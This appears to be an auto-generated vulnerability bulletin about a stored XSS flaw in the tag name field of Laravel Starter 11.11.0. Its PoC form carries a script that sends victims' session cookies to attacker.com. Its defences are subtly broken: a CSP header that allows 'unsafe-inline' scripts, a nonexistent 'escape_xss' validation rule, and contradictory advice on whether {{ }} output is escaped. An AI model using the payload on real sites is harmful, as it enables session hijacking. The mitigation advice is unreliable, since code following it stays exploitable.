Listen to this Post
How the CVE Works:
Laravel Starter 11.11.0 fails to properly sanitize user-supplied input in the tags feature. Attackers can inject malicious JavaScript payloads into the `name` field when creating or modifying tags. Since the application renders this field without proper escaping, the script executes in the victim’s browser when the tag is displayed. This stored XSS vulnerability allows attackers to steal session cookies, redirect users, or perform actions on their behalf. The lack of server-side validation and output encoding enables persistent exploitation.
DailyCVE Form:
Platform: Laravel Starter
Version: 11.11.0
Vulnerability: Stored XSS
Severity: Moderate
Date: Apr 22, 2025
What Undercode Say:
Exploitation:
1. Craft a malicious tag name with ``.
- Submit the payload via the tag creation/modification form.
- When another user views the tag, the script executes.
Protection:
1. Sanitize input using Laravel’s `e()` or `htmlspecialchars()`.
2. Implement Content Security Policy (CSP) headers.
3. Use Laravel’s validation rules:
$request->validate(['name' => 'string|escape_xss']);
Detection:
1. Scan for unescaped `{{ }}` Blade directives.
2. Check for raw HTML output in views:
{!! $tag->name !!} // Vulnerable
{{ $tag->name }} // Safe
Mitigation Commands:
1. Update Laravel Starter to the patched version.
2. Apply middleware to filter XSS payloads:
public function handle($request, $next) {
$input = $request->all();
array_walk_recursive($input, fn(&$v) => $v = htmlentities($v));
$request->merge($input);
return $next($request);
}
Exploit Code (PoC):
<form action="/tags" method="POST">
<input type="text" name="name" value="<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>">
</form>
CSP Header Example:
header("Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'");
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
